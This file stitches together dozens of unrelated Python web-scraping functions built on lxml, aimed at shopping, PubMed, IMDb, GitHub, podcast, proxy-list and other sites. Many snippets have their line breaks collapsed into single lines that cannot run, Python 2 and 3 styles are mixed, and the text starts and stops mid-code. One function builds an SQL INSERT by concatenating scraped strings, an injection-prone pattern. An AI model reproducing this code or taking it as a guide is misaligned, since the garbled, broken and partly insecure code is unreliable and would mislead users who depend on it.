def check_product_status(url, f):
    try:
        doc = lh.parse(url)
    except:
        print "page unable to load: http://www.bizrate.com/ratings_guide/guide/\n"
    try:
        links = doc.xpath('.//*[@id="section2"]/div/div/div/a[1]/@href')
        links.extend(doc.xpath('.//*[@id="section3"]/div/div/div/a[1]/@href'))
        links.extend(doc.xpath('.//*[@id="section4"]/div/div/div/a[1]/@href'))
        for element in set(links):
            try:
                p_url = 'http://aol.nextag.com' + element
                #p_url = p_url.replace('\'', '')
                #p_url = p_url.replace(' ', '%20')
                response = urllib2.urlopen(p_url)
                doc = lh.parse(response)
                p_list = doc.xpath('.//*[@id="search_results_content_id_0"]/li/div/a/@href')
                if len(p_list) == 0:
                    raise Exception
            except Exception:
                # no products found (or request failed): record the URL
                f.write(p_url + '\n')
    except:
        pass
def get_pmc_number(doc_tuple):
    if isinstance(doc_tuple, tuple):
        sim_num = doc_tuple[0]
        doc_file_name = DOCUMENT_FILE_NAMES[sim_num]
        pmc_num = ''
        pmc_page_title = ''
        try:
            pmc_num = TITLE_DICT[doc_file_name][0]
            pmc_link = 'http://www.ncbi.nlm.nih.gov/pubmed/{}'.format(pmc_num)
            try:
                pmc_page_title = pubmed_link_cache[pmc_link]
            except KeyError:
                print "didn't get from cache"
                t = html.parse(pmc_link)
                pmc_page_title = t.find(".//title").text
                pubmed_link_cache[pmc_link] = pmc_page_title
        except KeyError:
            return None
        if pmc_num == '':
            pmid = TITLE_DICT[doc_file_name][1]
            pmid_link = 'http://www.ncbi.nlm.nih.gov/pubmed/?term={}'.format(pmid)
            try:
                pmc_page_title = pubmed_link_cache[pmid_link]
            except KeyError:
                print "didn't get from cache"
                t = html.parse(pmid_link)
                pmc_page_title = t.find(".//title").text
                pubmed_link_cache[pmid_link] = pmc_page_title
            return pmid_link, pmc_page_title
        return pmc_link, pmc_page_title
def xkcdb(bot, trigger):
    qid = trigger.group(3)
    if qid:
        # specific quote lookup
        page = html.parse('http://www.xkcdb.com/%s' % qid).getroot()
    else:
        # random quote
        page = html.parse('http://www.xkcdb.com/random1').getroot()
    try:
        quoteblock = page.cssselect('p.quoteblock')[0]
    except IndexError:
        # parenthesize the conditional so only the "#<id> " fragment is optional
        bot.say("XKCDB quote %snot found!" % (("#%s " % qid) if qid else ""))
        return
    header = quoteblock.cssselect('span.quotehead')[0]
    quote = quoteblock.cssselect('span.quote')[0]
    for br in quote.xpath('*//br'):
        br.tail = '\n' + br.tail if br.tail else '\n'
    lines = quote.text_content().split('\n')
    qid = int(header.cssselect('.idlink')[0].text_content()[1:])
    ratings = re.search('\(\+(?P<up>\d+)/\-(?P<down>\d+)\)', header.text_content())
    up = formatting.color('+%s' % ratings.group('up'), 'green')
    down = formatting.color('-%s' % ratings.group('down'), 'red')
    url = 'http://www.xkcdb.com/%s' % qid
    bot.say("XKCDB quote #%s (%s/%s) - %s" % (qid, up, down, url))
    if len(lines) <= 6:
        for line in lines:
            bot.say(line)
    else:
        for line in lines[:3]:
            bot.say(line)
        bot.say("[Quote truncated. Visit %s to read the rest.]" % url)
def CacheItems(): items_cache = open(CACHEFile, 'w'); try: MainMenuLinks = []; #if not os.path.exists(imagesDir): #os.makedirs(imagesDir); page = urllib2.urlopen(site_url + '/catalog'); tree = html.parse(page); root = tree.getroot(); catalog_elem = root.get_element_by_id('catalog'); #catalog_elem = catalog_elem.find_class('inner').pop(); if catalog_elem is not None: MainMenuItems = catalog_elem.find_class('menu').pop(); #print MainMenuItems; #парсим категории if (MainMenuItems is not None) and (MainMenuItems.tag == 'ul'): for MainMenuItem in MainMenuItems: for link in MainMenuItem.iterlinks(): if 'catalog' in link[2]: MainMenuLinks.append(link[2]); print 'MainMenu link:' + link[2]; #Обходим все страницы for MainMenuLink in MainMenuLinks: page_num = 1; ItemsEnded = False; First_stored = False; while not ItemsEnded: try: print 'Opening: ' + site_url + MainMenuLink + '?PAGEN_1={0}'.format(page_num); page = urllib2.urlopen(site_url + MainMenuLink + '?PAGEN_1={0}'.format(page_num), timeout = 10000); tree = html.parse(page); root = tree.getroot(); if not root.find_class('errortext'): lst = root.find_class('product-list').pop(); ItemsEnded = True; for link in lst.iterlinks(): if re.search('^/catalog/[A-Za-z_0-9]+/[A-Za-z_0-9]+/$', link[2]): if not First_stored: First_item = link[2]; First_stored = True; if (page_num != 1) and (First_item == link[2]): ItemsEnded = True; break; else: ItemsEnded = False; print 'Cached:' + link[2]; items_cache.write(link[2] +'\n'); else: ItemsEnded = True; except: print site_url + MainMenuLink + '?PAGEN_1={0}'.format(page_num) + ' is broken!!!'; page_num += 1; continue; page_num += 1; items_cache.close(); except: items_cache.close(); raise;
def fillemission(self,query=""): emissions=[] html_parser = etree.HTMLParser(encoding='utf-8', recover=True,strip_cdata=True) page= html.parse(self.url) try: expressiontitle = GenericTranslator().css_to_xpath(self.argtitle) expressionurl = GenericTranslator().css_to_xpath(self.argurl) except SelectorError: return 0 #feedparser.error('Invalid CSS selector') for e,eid in zip(page.xpath(expressiontitle),page.xpath(expressionurl)): if eid.get("href"): try: if self.name=="France culture": foundb =re.search('/podcast/(.*)', eid.get("href")).group(1) pageb = html.parse("http://www.franceculture.fr/podcast/"+foundb) aaa= pageb.xpath(GenericTranslator().css_to_xpath(".lien-rss"))[0] found = re.search("http.*rss_(.*)\.xml",aaa.get("href")).group(1) print found else: found =re.search('http.*rss_(.*)\.xml', eid.get("href")).group(1) except AttributeError: found = '' else: found="" etemp = emissionradiofrance(e.text,found) emissions.append(etemp) self.emissions=emissions
def fillemissionindb(self,query=""): self.cleardb() conn = sqlite3.connect('podcast.db') c = conn.cursor() html_parser = etree.HTMLParser(encoding='utf-8', recover=True,strip_cdata=True) page= html.parse(self.url) try: expressiontitle = GenericTranslator().css_to_xpath(self.argtitle) expressionurl = GenericTranslator().css_to_xpath(self.argurl) except SelectorError: return 0 #feedparser.error('Invalid CSS selector') for e,eid in zip(page.xpath(expressiontitle),page.xpath(expressionurl)): if eid.get("href"): try: if self.name=="France culture": foundb =re.search('/podcast/(.*)', eid.get("href")).group(1) pageb = html.parse("http://www.franceculture.fr/podcast/"+foundb) aaa= pageb.xpath(GenericTranslator().css_to_xpath(".lien-rss"))[0] found = re.search("http.*rss_(.*)\.xml",aaa.get("href")).group(1) print found else: found =re.search('http.*rss_(.*)\.xml', eid.get("href")).group(1) except AttributeError: found = '' else: found="" etemp = emissionradiofrance(e.text,found) qqq = "INSERT INTO emissions (station, title, podcasturl, idemission) VALUES (\""+self.name+"\",\""+etemp.name+"\",'"+etemp.podcasturl+"','"+str(etemp.idpod)+"')" print qqq c.execute(qqq) conn.commit() conn.close()
def listuj_linie(url):
    """
    Opens the given URL (for the MPK site a redirect has to happen, because
    we get index.jsp rather than .html) and fetches the list of lines.

    TODO: distinguish day/night buses and trams? That sub-page makes it possible.
    """
    tree = html.parse(url + '/index.html')
    przekierowanie = tree.xpath('//meta [@http-equiv="refresh"]')
    if przekierowanie:
        # Take the first element of that list and grab the text to the
        # right of URL= in its 'content' attribute.
        nowy_url = przekierowanie[0].attrib['content'].split('URL=')[-1]
        tree = html.parse(nowy_url)
    linie_tree = wybierz_ramke(tree, 'rozklad', url)
    linie_td = linie_tree.xpath('//div [contains(@id,bx1)]//td'
                                '[@class="nagl" and not(contains(.,"Aktualny"))]')
    ret = []
    makedir_quiet('przetworzone')
    f = open('przetworzone/lista_linii.txt', 'w')
    for linia in linie_td:
        link = linia.xpath('a')[0]
        # strip "Linia: " from the link and treat the rest as the line name
        nazwa_linii = link.text_content().lstrip("Linia: ")
        url_linii = url + link.attrib['href']
        ret += [Linia(nazwa_linii, url_linii, url)]
        print(nazwa_linii, file=f)
    return ret
def get_article(url):
    ## Section 0 - Initial set.
    blog_url = list()
    dem = list()

    ## Section 1 - Get frame src.
    dem.append(html.parse(url).getroot())
    blog_url.append("http://blog.daum.net" + dem[0][1][0].attrib["src"])
    # print "[System] Got blog-url[1] from iframe successfully. :", blog_url[0]

    ## Section 2 - Get frame src (2).
    dem.append(html.parse(blog_url[0]).getroot())
    frames = dem[1].cssselect("iframe")
    for frame in frames:
        if "if_b" in frame.get("name"):
            blog_url.append("http://blog.daum.net" + frame.get("src"))
    # print "[System] Got blog-url[2] from iframe successfully. :", blog_url[1]

    ## Section 3 - Get contents of article.
    dem.append(html.parse(blog_url[1]).getroot())
    article = dem[2].cssselect("div#contentDiv")[0]
    img_links = get_images(article)

    ## Section 4 - Return data.
    return st.strip_html(html.tostring(article, encoding="utf-8", method="html")), img_links
def _get_tree_from_url(self, url):
    if not url:
        return
    if url.startswith('/'):
        url = "http://www.redbus.in" + url
    urlstr = url.replace('/', '_')
    try:
        # try the on-disk cache first
        f = open("dump/%s" % urlstr, 'r')
        doc = html.fromstring(f.read())
        tree = etree.ElementTree(doc)
        print 'Found'
    except:
        print "Error:", sys.exc_info()[0]
        # not cached yet: download the page and store a copy in dump/
        tree = html.parse(url)
        if not tree:
            print "\nFalling back"
            tree = html.parse(url)
        output = open("dump/%s" % urlstr, 'w')
        output.write(html.tostring(tree))
        output.close()
    return tree
def get_poster(self, download=True, force=False): imdb_id = self.movie_imdb_id genre = list() if self.has_poster() and not force: return os.path.join(R_POSTERS_PATH, str(imdb_id)+'.jpg') second_page = parse(self.__create_request(movie_url(imdb_id))) if second_page: try: poster_page_url = second_page.xpath("//td[@id='img_primary']/a")[0].attrib.get('href') except IndexError: poster_page_url = None poster_url = None if poster_page_url is not None: poster_page = parse(self.__create_request('http://www.imdb.com'+poster_page_url)) try: poster_url = poster_page.xpath("//div[@id='photo-container']/div[@id='canvas']//img[@id='primary-img']")[0].attrib.get('src') except IndexError: poster_url = None if poster_url and download: print poster_url try: f = self.__create_request(poster_url) except: pass else: path = os.path.join(POSTERS_PATH, str(imdb_id)+'.jpg') with open(path, 'w') as local: local.write(f.read()) poster_url = os.path.join(R_POSTERS_PATH, str(imdb_id)+'.jpg') if poster_url is None: poster_url = UNKNOWN_POSTER_PATH return poster_url
def scrapeGit(): lst = [] nextPage = 'https://github.com/showcases' curr = 1 last = 0; while(curr > last): url = urlopen(nextPage) tree = parse(url) #Gets a list of categories on the page page = tree.xpath('//*[@id="site-container"]/div[2]/ul//li/a/@href') #Goes through each category and gets the repo titles and descriptions for i in range(0, 2): time.sleep(3) url = urlopen('https://github.com' + page[i]) tree2 = parse(url) title = tree2.xpath('//*[@id="site-container"]/div[2]/div[2]/div/div[1]/ul[2]//li/h3/a/@href') des = tree2.xpath('//*[@id="site-container"]/div[2]/div[2]/div/div[1]/ul[2]//li/p/text()') for x in range(0, len(title)-1): newTitle = '' for j in reversed(title[x]): if j == '/': break else: newTitle = j + newTitle newDes = des[x].strip().replace('\n', '') " ".join(newDes.split()) link = 'github.com'+ title[x] source = 'GIT' newProj = project(newTitle, newDes, link, "", source) lst += [newProj] nextPage = tree.xpath('//*[@id="site-container"]/div[2]/div[3]/div/a[last()]/@href')[0] last += 1 curr = int(nextPage[-1]) return lst
def fetch_ipeen_info(url):
    root = parse(_IPEEN_BASE_URL + url).getroot()

    # get basic information
    info_rows = root.xpath('//table[@class="binfo"]/tr/td/div')
    basic_info_list = [_remove_space(row.text_content()) for row in info_rows]

    # get comments
    comment_links = root.xpath('//h2[@class="absTitle"]/a')
    comment_list = _extract_links(comment_links)

    # get more shops
    path = './/div[@class="name"]/a'
    shop_blocks = root.xpath('//div[@class="sblock rec"]')
    shop_list = {
        'rel': _extract_links(shop_blocks[0].iterfind(path)),
        'near': _extract_links(shop_blocks[1].iterfind(path))
    }

    # get photos
    url = url.replace('/shop/', '/shop/photos/')
    root = parse(_IPEEN_BASE_URL + url).getroot()
    photo_imgs = root.xpath('//a[@rel="shop_photos_share"]/img')
    photo_list = ['http:' + img.get('src') for img in photo_imgs]

    # wrap information
    info = {
        'basic_info': basic_info_list,
        'comments': comment_list,
        'more_shop': shop_list,
        'photos': photo_list
    }
    return info
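# A minimal usage sketch for the function above; the shop path "/shop/72345/"
# is a made-up placeholder, and _IPEEN_BASE_URL, _remove_space and
# _extract_links are assumed to be defined elsewhere in the original module.
if __name__ == '__main__':
    info = fetch_ipeen_info('/shop/72345/')
    print(info['basic_info'])
    print(len(info['comments']), 'comment links')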
def get_apocopes(list_urls): apo_urls = [] for list_url in list_urls: for node in parse(list_url).findall('.//div[@class="mw-category"].//li/a[@href]'): apo_urls.append((node.text, 'http://fr.wiktionary.org' + node.attrib['href'])) with codecs.open('wiki.log', 'w', 'utf-8') as log: apos = {} for short, url in sorted(apo_urls): short = short.lower() if short not in apos: apos[short] = [] fulls = apos[short] for node in parse(url).findall('.//dl/dd'): #/i/a[@href] text = etree.tostring(node, encoding = 'unicode', method = "text").lower().replace('\n', '') fulls_sub = [] for match in extractor.findall(text): for full in match: full = cleaner.sub('\\1', full) if not full: continue fulls_sub.append(full) log.write(delim.join([short, str(fulls_sub), text]) + newline) if not fulls_sub: print short, '=>', text continue for full in fulls_sub: if full not in fulls: fulls.append(full) return apos
def replace_terms(html): html = force_text(html) remove_body = False remove_p = False etree = parse(StringIO(html)) root_node = etree.getroot() if not _looks_like_full_html_unicode(html): root_node = root_node.getchildren()[0] remove_body = True if root_node.getchildren()[0].tag == 'p' and html[:3] != '<p>': remove_p = True variants_dict = Term.objects.variants_dict() replace_dict = Term.objects.replace_dict() replace_regexp = Term.objects.replace_regexp() replace_regexp__sub = replace_regexp.sub translate = get_translate_function(replace_dict, variants_dict) for node in get_interesting_contents(root_node, replace_regexp): new_content = replace_regexp__sub( translate, tostring(node, encoding='unicode')) new_node = parse(StringIO(new_content)).getroot().getchildren()[0] if node.tag != 'body': new_node = new_node.getchildren()[0] node.getparent().replace(node, new_node) if remove_body: if remove_p: root_node = root_node.getchildren()[0] out = root_node.text or '' out += ''.join([tostring(node, encoding='unicode') for node in root_node.getchildren()]) return out return tostring(etree, encoding='unicode')
def fetch_or_load(spec_path):
    """
    Fetch a new specification or use the cache if it's current.

    :argument spec_path: the path to a cached specification
    """
    headers = {}

    try:
        modified = datetime.utcfromtimestamp(os.path.getmtime(spec_path))
        date = modified.strftime("%a, %d %b %Y %I:%M:%S UTC")
        headers["If-Modified-Since"] = date
    except OSError as error:
        if error.errno != errno.ENOENT:
            raise

    request = urllib.Request(VALIDATION_SPEC, headers=headers)
    response = urllib.urlopen(request)

    if response.code == 200:
        with open(spec_path, "w+b") as spec:
            spec.writelines(response)
            spec.seek(0)
            return html.parse(spec)

    with open(spec_path) as spec:
        return html.parse(spec)
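# A small usage sketch, assuming VALIDATION_SPEC and the urllib alias used
# above are defined in the surrounding module; "spec_cache.html" is just an
# illustrative cache path.
spec = fetch_or_load("spec_cache.html")
print(spec.getroot().find(".//title").text)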
def get_poster(self):
    movie_title = self.movie_title
    page_search_list = parse(urllib2.urlopen(
        'http://movieposterdb.com/browse/search?' +
        urllib.urlencode({'type': 'movies', 'query': movie_title})))
    page_movie_gallery = page_search_list.xpath('//tr/td/b/a')[0].attrib.get('href')
    movie_poster_gallery = parse(urllib2.urlopen(page_movie_gallery))
    movie_poster = movie_poster_gallery.xpath('//tr/td/div/a/img')[0].attrib.get('src')
    return dict(poster=movie_poster)
def get_index():
    """ Traverse the search results of an empty query for projects
    in the CORDIS database. """
    # fetch an initial page:
    doc = html.parse(INITIAL_URL)

    # infinite loop isn't nice, but we'll break when no 'next' link is
    # available.
    while True:
        # iterate over the links for all projects on this page
        for project_link in doc.findall('//div[@id="PResults"]//a'):
            # join up URLs to generate the proper path
            href = project_link.get('href').replace('..', '')
            yield urljoin(INITIAL_URL, href)

        next_url = None
        # look at all links in the navigation section of the listing
        for nav in doc.findall('//p[@class="PNav"]/a'):
            # if the link is a 'next' link, follow it
            if 'Next' in nav.text:
                href = nav.get('href').replace('..', '')
                next_url = urljoin(INITIAL_URL, href)
                # replace the document to traverse the next page in
                # the following iteration
                doc = html.parse(next_url)

        # no next link was found, so cancel
        if not next_url:
            break
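# Because get_index() is a generator, it can be consumed lazily; a sketch,
# assuming INITIAL_URL points at the CORDIS search results page.
for n, project_url in enumerate(get_index()):
    print(project_url)
    if n >= 10:  # stop after a handful of results while testing
        break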
def identify_and_get_right_url(url): tree = html.parse(url).getroot() is_problem_statement_string = tree.xpath('/html/body/table/tr/td[3]/table[1]/tr/td[3]/span/text()')[0].strip(' \t\n\r') # check if its a Problem statement page that is passed if re.search(r'Problem Statement', is_problem_statement_string): problem_detail_url = tree.xpath('/html/body/table/tr/td[3]/table[2]/tr[1]/td/table/tr[10]/td/a/@href')[0].strip(' \t\n\r') url = 'http://community.topcoder.com' + problem_detail_url print 'Given url is a problem statement url, trying to get a problem detailed url out of it' if check_is_url(url): print 'Extracted problem detailed page url = ', url return url else: print "ERROR: couldn't find problem detailed page url. Exiting!" sys.exit(1) # check if its a Problem detail page url tree = html.parse(url).getroot() is_problem_detail_string = tree.xpath('/html/body/table/tr/td[3]/table/tr/td[3]/span/text()')[0].strip(' \t\n\r') if re.search(r'Problem Detail', is_problem_detail_string): print 'Given url is a problem detail url' return url print "ERROR: Doesn't look like a topcoder url" sys.exit(1)
def get_sentence_xpath_tuples(url, xpath_to_text=TEXT_FINDER_XPATH): """ Given a url and xpath, this function will download, parse, then iterate though queried text-nodes. From the resulting text-nodes, extract a list of (text, exact-xpath) tuples. """ try: parsed_html = html.parse(url) except IOError as e: # use requests as a workaround for problems in some # sites requiring cookies like nytimes.com # http://stackoverflow.com/questions/15148376/urllib2-returning-no-html page = requests.get(url) # http://lxml.de/parsing.html parsed_html = html.parse(BytesIO(page.content), html.HTMLParser()) xpath_finder = parsed_html.getroot().getroottree().getpath nodes_with_text = parsed_html.xpath(xpath_to_text) sent_xpath_pairs = [ ('\n\n' + s, xpath_finder(n)) if e == 0 # hard-code paragraph breaks (there has to be a better way) else (s, xpath_finder(n)) for n in nodes_with_text for e, s in enumerate(sentence_token_pattern.split(bracket_pattern.sub('', ''.join(n.xpath('.//text()'))))) if s.endswith(tuple(sentence_ending)) ] return sent_xpath_pairs
def imdb(ircbot, input): origterm = input.groups()[1] if not origterm: return ircbot.say('Perhaps you meant ".wik Zen"?') origterm = origterm.encode('utf-8') doc = parse("http://m.imdb.com/find?q=" + urllib.quote(origterm)); try: first_result = doc.xpath("/html/body/section/div/div/div")[0]; movie_name = first_result.text_content().strip(); movie_url = first_result.xpath("a")[0].get("href"); except: return ircbot.say("No result"); re_uri = re.compile("\/title\/tt[0-9]*\/"); if re_uri.match(movie_url): doc = parse("http://m.imdb.com" + movie_url).getroot(); details = doc.cssselect("section.details")[0]; for i in details.xpath('div/h1'): if i.text == "Genre": genre = i.getnext().text; try: rating = doc.xpath("/html/body/section/a/p/strong")[0].text; #Unreleased movies have no rating except: rating = ""; else: return ircbot.say("No result"); return ircbot.say(movie_name + " - " + genre + " - " + rating + "/10 - http://imdb.com" + movie_url); ircbot.say(movie_name + " " + movie_url);
def get_sentence_xpath_tuples(url, xpath_to_text = TEXT_FINDER_XPATH): """ Given a url and xpath, this function will download, parse, then iterate though queried text-nodes. From the resulting text-nodes, extract a list of (text, exact-xpath) tuples. """ try: parsed_html = html.parse(url) except IOError as e: # workaround for problems in some sites requiring cookies # like nytimes.com # http://stackoverflow.com/questions/15148376/urllib2-returning-no-html import requests page = requests.get(url) try: from cStringIO import StringIO as BytesIO except ImportError: from io import BytesIO # http://lxml.de/parsing.html parsed_html = html.parse( BytesIO(page.content), html.HTMLParser() ) xpath_finder = parsed_html.getroot().getroottree().getpath nodes_with_text = parsed_html.xpath(xpath_to_text) sent_xpath_pairs = [(s, xpath_finder(n)) for n in nodes_with_text for s in sentence_token_pattern_C.split( bracket_pattern.sub( '', ''.join( n.xpath( './/text()') ) ) ) if s.endswith('.')] return sent_xpath_pairs
def parse(self, url):
    page = html.parse(url)
    dates = page.xpath(self.regex_date)
    exhibitions = page.xpath(self.regex_event)
    for date in dates:
        dprint("Date: %s" % date.text)
    events_list = []
    for exhibition in exhibitions:
        dprint("=" * 20)
        dprint("Exhibition name: %s" % exhibition.text)
        dprint("Additional info: %s" % exhibition.attrib['href'])
        url_description = exhibition.attrib['href']
        page_additional_info = html.parse(url_description)
        event_description = "Пусто"  # default description ("Empty")
        try:
            event_description = page_additional_info.xpath(self.regex_event_description).pop().text
        except Exception:
            pass
        dprint("Description: %s" % event_description)
        event_address = page_additional_info.xpath(self.regex_address).pop().text
        event_date = page_additional_info.xpath(self.regex_date).pop().text
        dprint("Address: %s" % event_address)
        dprint("Date: %s" % event_date)
        event = Event(description=event_description, address=event_address, date=event_date)
        events_list.append(event)
    return events_list
def _get(self):
    h = html.parse(self.URL).getroot()
    h.make_links_absolute(self.URL)
    urls = set(
        re.sub('-(\d)\.', '-0\\1.', e.get('href'))
        for e in h.cssselect('.page')
    )
    for url in urls:
        h = html.parse(url).getroot()
        h.make_links_absolute(self.URL)
        h.cssselect('#advcenter')[0].getparent().drop_tree()
        entries = h.cssselect('#proxylist tr:nth-child(n+2)')
        data_url = h.cssselect('#ipportonly > a')[0].get('href')
        h = html.parse(data_url).getroot()
        data = h.cssselect('#content pre')[0].text
        for i, line in enumerate(data.splitlines()):
            ip, port = line.split(':')
            yield Proxy(
                ip, port,
                country=entries[i][3].text,
                anonlevel=entries[i][1].text,
                source=self.__class__.__name__
            )
def scraper(url, package, tmp):
    """find and validate source tar.gz with md5 and pgp signatures

    searches for links to the 'package' on the 'url', downloads the
    .tar.gz, .tar.gz.md5, and .tar.gz.asc

    uses the .tar.gz.md5 and the .tar.gz.asc to validate the .tar.gz

    returns the path to the .tar.gz file inside of 'tmp'
    """
    # print "%s %s" % (url, package)
    doc = parse(urlopen(url)).getroot()
    doc.make_links_absolute(url)
    links = doc.xpath("//a[contains(@href,'%s')]/@href" % package)
    download_url = [i for i in links if i.endswith('.tar.gz')][0]
    # sometimes the download link does not let you download
    if download_url.startswith('http://www.apache.org/dyn/closer.cgi'):
        doc2 = parse(urlopen(download_url)).getroot()
        download_url = doc2.xpath("//a[contains(@href,'%s')][1]/@href" % package)[0]
    # pp(download_url)
    archive = downloadChunks(download_url, tmp)
    md5_file = downloadChunks([i for i in links if i.endswith('tar.gz.md5')][0], tmp)
    checksum = md5sum(archive)
    # make sure the checksum is correct
    print checksum
    assert(checksum in open(md5_file).read())
    pgp_file = downloadChunks([i for i in links if i.endswith('tar.gz.asc')][0], tmp)
    subprocess.check_call(["gpg", "--verify", pgp_file, archive])
    return archive
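# A hedged usage sketch: the mirror URL and package name below are only
# illustrative, and downloadChunks/md5sum are helpers assumed to exist in the
# original module.
if __name__ == '__main__':
    tarball = scraper('http://www.apache.org/dist/httpd/', 'httpd', '/tmp')
    print tarball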
def scrape_thread(thread): print base+"/community/pr.aspx"+thread.attrib["href"][23:] title = thread.text qid = re.findall('\d*$', thread.attrib['href'])[0] t = html.parse(base+"/community/pr.aspx"+thread.attrib["href"][23:]) for br in t.xpath("*//br"): br.tail = "\n" + br.tail if br.tail else "\n" no_signatures = re.sub('<hr.*?/td>', "", etree.tostring(t), flags=re.DOTALL) meta = t.xpath('//td[@class="printHead"]') posters = set() post_content = html.parse(StringIO(no_signatures)).xpath('//td[@class="printBody"]')[1:] for i, post in enumerate(zip(meta, post_content)): inferred_replies = set() local_id = i - 1 reply_to = qid + "_top" if local_id >= 0 else " " poster = post[0].xpath('b')[0].text date = post[0].xpath('b')[0].tail[3:] content = post[1].text_content() unique_id = qid + "_top" if local_id < 0 else qid + "_" + str(local_id) for p in posters: if p in content: inferred_replies.add(p) row = [unique_id, qid, local_id, title, poster, date, reply_to, content, ' | '.join(inferred_replies), subforum] w.writerow(row) f.flush() posters.add(poster)
def find_path() : html_file = "ETOZGianfranco.html" input_string = "Gianfranco Frattini" elem_tree = lh.parse(html_file) xpath = "//*[contains(normalize-space(.), '{0}') and not(.//*[contains(normalize-space(.), '{0}')])]/*" node = elem_tree.xpath(xpath.format(input_string))[0] path = elem_tree.getpath(node) #Use parent path path = path[:path.rfind('/')] #Use template result = elem_tree.xpath(path)[0] result_html = tostring(result) result_class = result.attrib.get('class') print '{0} -> {1}'.format(input_string, elem_tree.getpath(node)) #Use template html_file2 = "ETOZCocktail.html" elem_tree2 = lh.parse(html_file2) result2 = elem_tree2.xpath(path)[0] result2_html = tostring(result2) #Create dao dao = Dao() #Update template dao.update_path(19, path) #Insert record dao.insert_record('TestUrl', result_html, 19) dao.insert_record('TestUrl', result2_html, 19)
def grabinfo(self, url):
    try:
        company = html.parse(url)
    except Exception:
        print('Bad URL: ', url)
        return ['Bad URL', '---', '---', '---', '---', url]
    offices = company.xpath("//div[@class='offices']/text()")
    if len(offices) > 0 and self.city['ru'] in offices[0]:
        # self.city['ru'].decode('utf-8') in Python 2.7
        offices = offices[0].strip()
    else:
        return None
    companyname = company.xpath("//h1[@class='g-h2']/text()")[0].strip()
    staff = company.xpath("//div[@class='company-info']/text()")
    if len(staff) > 0:
        staff = max([el.strip() for el in staff])
    else:
        staff = ''
    site = company.xpath("//div[@class='site']/a/@href")
    if len(site) > 0:
        site = site[0]
    else:
        site = ''
    companyoffice = html.parse(url + 'offices/')
    adress = companyoffice.xpath("//a[@name='" + self.city['en'] + "']/../div/div[2]/div[1]/div/div[1]/text()")
    if len(adress) > 0:
        adress = adress[0].strip()
    else:
        adress = ''
    return [companyname, staff, offices, adress, site, url]
def load_page(username):
    try:
        page = html.parse('html/%s.htm' % username)
    except:
        load_html(username)
        page = html.parse('html/%s.htm' % username)
    return page.getroot()
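# Usage sketch: load_html() is assumed to fetch and save 'html/<username>.htm'
# before it gets parsed; the username below is only illustrative.
root = load_page('example_user')
title = root.find('.//title')
print(title.text if title is not None else 'no <title> found')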
def main():
    url = 'http://www.onekp.com/public_data.html'
    html = 'public.html'
    handle = open('result.tsv', 'w')
    if not exists(html):
        raw = parse(url)
    else:
        raw = parse(html)
    # /html/body/table/tr/td/self|b|a.href
    all_tr = raw.xpath('//tr')
    for tr in all_tr:
        all_td = tr.findall('td')
        for td in all_td:
            # some <td> have descendants, get a.href
            for i in td.iter():
                if i.tag == 'a':
                    handle.write(i.attrib['href'])
                    break
                elif i.tag == 'td':
                    handle.write(i.text_content() + ' ')
                else:
                    pass
            handle.write('\t')
        handle.write('\n')
    handle.close()
    print('Done')
def getPages(manga, chapter):
    url = URI + '/' + manga + '/' + chapter + '/'
    root = html.parse(url)
    soup = root.xpath('//li')
    url = URI + soup[0][0].get('href')
    root = html.parse(url)
    pages = root.xpath('//select[@class="page-select"]')
    return [page.text for page in pages[0].getchildren()]
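# Usage sketch: URI is assumed to be the base address of the manga site used
# above, and the manga/chapter slugs are placeholders.
pages = getPages('some-manga', 'chapter-1')
print('%d pages found' % len(pages))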
import urllib
from HTMLParser import HTMLParser
from lxml.html import parse

urltext = []


class myHTMLParser(HTMLParser):
    def handle_data(self, data):
        if data != '\n':
            urltext.append(data)


if __name__ == '__main__':
    fileParser = myHTMLParser()
    testUrl = "http://www.shopping.com/products?KW=<keyword>"
    parsedURL = parse(testUrl)
    doc = parsedURL.getroot()
    links = doc.findall('.//a')
    linksSet = []
    for entry in links:
        linksSet.append(entry.get('href'))
    for entry in linksSet:
        print entry
    # pageHandle = urllib.urlopen(testUrl).read()
    # print pageHandle+"\n\n"
    # fileParser.feed(pageHandle)
    # fileParser.close()
    # print urltext
def get_lxml_elements(url, element):
    _skip_if_no('lxml')
    from lxml.html import parse

    doc = parse(url)
    return doc.xpath('.//{0}'.format(element))
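# Usage sketch: this helper comes from a test suite, so _skip_if_no('lxml') is
# assumed to be available there; the URL below is a placeholder.
tables = get_lxml_elements('http://example.com/page.html', 'table')
print(len(tables))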
# -*- coding: UTF-8 -*-
from lxml import html
import os
import sys

reload(sys)
sys.setdefaultencoding('utf-8')

seed_url = u"http://www.kekenet.com/read/essay/ats/"
x = html.parse(seed_url)
spans = x.xpath("*//ul[@id='menu-list']//li/h2/a")
for span in spans[:10]:
    details_url = span.xpath("attribute::href")[0]
    xx = html.parse(details_url)
    name = 'story//' + span.text.replace(u' ', u'_')
    f = open(name, 'a')
    try:
        contents = xx.xpath("//div[@id='article']//p/text()")
        for content in contents:
            if len(str(content)) > 1:
                f.write(content.encode('utf-8') + '\n')
    except Exception, e:
        print "wrong!!!!", e
        f.close()
        os.remove(name)
    else:
        f.close()
import datetime import sys links = [] class MyHTMLParser(HTMLParser): def handle_starttag(self, tag, attributes): if tag == 'a': for name, value in attributes: if name == 'routerlink': links.append(value) parser = MyHTMLParser() tree = html.parse('src/app/app.component.html') parser.feed(html.tostring(tree).decode("utf-8")) parser.close() # prune /home since it's a duplicate of base url links.remove('/home') base_url = 'https://www.egill.rocks' missing_links = links.copy() tree = ET.parse('deploy/sitemap.xml') root = tree.getroot() url_el = list(root) for el in url_el: for link in links: # assume sub-element 'loc' is the first one in the order if el[0].text == base_url + link:
def html_parse(site_string): # tmp = lhtml.parse(url_string) site = lhtml.parse(StringIO(site_string)) cleaner = Cleaner(style=True, links=True, add_nofollow=True, page_structure=False, safe_attrs_only=False) html = cleaner.clean_html(site) body = html.getroot().cssselect('body')[0] for ele in body.cssselect('.header'): ele.drop_tree() for ele in body.cssselect('#header'): ele.drop_tree() for ele in body.cssselect(".ui-toolkit"): ele.drop_tree() for ele in body.cssselect('#footer'): ele.drop_tree() for ele in body.cssselect('nav'): ele.drop_tree() #goSquared for ele in body.cssselect('.navOffset'): ele.drop_tree() #exoscale for ele in body.cssselect('hgroup'): ele.drop_tree() #vircurex for ele in body.cssselect('.banner'): ele.drop_tree() #tyntec for ele in body.cssselect('.bar'): ele.drop_tree() #1linx for ele in body.cssselect('section'): ele.drop_tag() #one signal for ele in body.cssselect('#hub-header'): ele.drop_tree() for ele in body.cssselect('header'): ele.drop_tag() #clever tap for ele in body.cssselect('.doc-article__breadcrumb'): ele.drop_tree() for ele in body.iter(): if 'div' == 